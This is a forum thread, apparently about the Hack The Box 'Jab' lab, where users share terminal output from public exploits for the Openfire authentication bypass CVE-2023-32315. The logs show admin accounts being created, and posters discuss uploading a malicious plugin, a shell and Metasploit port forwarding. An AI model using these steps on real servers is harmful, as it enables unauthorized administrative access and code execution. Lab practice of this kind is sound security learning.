┌──(root㉿kali)-[/home/kali/HTB/Jab/CVE-2023-32315]
└─# python CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node0ojd3c3umuzcbs01w4swcmvxk10.node0 + csrf: uvClflib6cPd853
User added successfully: url: http://127.0.0.1:9090 username: hyft37 password: 0e18dn
██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗
██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝
═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════
╔════════════╩═════════════════════════════════╩═════════════════════════════╗
║ • AUTHOR | PARI MALAM ║
║ • GITHUB | GITHUB.COM/PARI-MALAM ║
╔════════════════════════════════════════════════════════════════════════════╝
║ • OFFICIAL FORUM | DRAGONFORCE.IO ║
║ • OFFICIAL TELEGRAM | TELEGRAM.ME/DRAGONFORCEIO ║
╚════════════════════════════════════════════════════════════════════════════╝
[CVE-2023–32315] - Openfire Console Authentication Bypass Vulnerability
[CVE-2023–32315] - http://127.0.0.1:9090 - Checking in current... Please be patient!
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] JSESSIONID: node0plgkr5c36gak49837oldb23p4.node0 CSRF: 6jP6N9YBxyyrII2
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] Successful with no problemo!
[+] URLs: http://127.0.0.1:9090
Username: rxjxaa
Password: mfn3yq
Thx for any ideas!!
you got the user and password.
bit my question is, where do I get a malicious plugin to upload?
(Feb 25, 2024, 07:47 PM)query1338 Wrote: (Feb 25, 2024, 07:34 PM)kokot0kokot0 Wrote: Hi, can anyone help me with login to OpenFire Console? I try 3 exploits of CVE-2023-32315 bypass and manual way, but no luck. Login is not working...
I tried a login -u administrator -p 'odW!!mVfbXs304kskt!QAZDVGY&@' creds no luck.
I don't know there I have a mistake. New login user looks genrated correctly>
┌──(root㉿kali)-[/home/…/Jab/CVE-2023-32315/CVE-2023-32315-Openfire-Bypass/scan_all]
└─# /snap/bin/go run main.go -u http://127.0.0.1:9090
成功获取目标http://127.0.0.1:9090 JSESSIONID: node05fhguao7ux1f230lglps26it12.node0 +csrf: qHY7oJepIsjL1UG
用户增加成功:url:http://127.0.0.1:9090 username:3br8qs password:f0bqso
┌──(root㉿kali)-[/home/kali/HTB/Jab/CVE-2023-32315]
└─# python CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node0ojd3c3umuzcbs01w4swcmvxk10.node0 + csrf: uvClflib6cPd853
User added successfully: url: http://127.0.0.1:9090 username: hyft37 password: 0e18dn
██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗
██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝
═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════
╔════════════╩═════════════════════════════════╩═════════════════════════════╗
║ • AUTHOR | PARI MALAM ║
║ • GITHUB | GITHUB.COM/PARI-MALAM ║
╔════════════════════════════════════════════════════════════════════════════╝
║ • OFFICIAL FORUM | DRAGONFORCE.IO ║
║ • OFFICIAL TELEGRAM | TELEGRAM.ME/DRAGONFORCEIO ║
╚════════════════════════════════════════════════════════════════════════════╝
[CVE-2023–32315] - Openfire Console Authentication Bypass Vulnerability
[CVE-2023–32315] - http://127.0.0.1:9090 - Checking in current... Please be patient!
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] JSESSIONID: node0plgkr5c36gak49837oldb23p4.node0 CSRF: 6jP6N9YBxyyrII2
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] Successful with no problemo!
[+] URLs: http://127.0.0.1:9090
Username: rxjxaa
Password: mfn3yq
Thx for any ideas!!
you got the user and password.
bit my question is, where do I get a malicious plugin to upload?
That didn't really post right. Second try:
https://github.com/miko550/CVE-2023-32315/tree/main
Posts: 7
Threads: 0
Joined: Feb 2024
I have svc_openfire shell but I don't know how to port forward the OpenFire port to access it, I tried Metasploit port forwarding but nothing. 
|
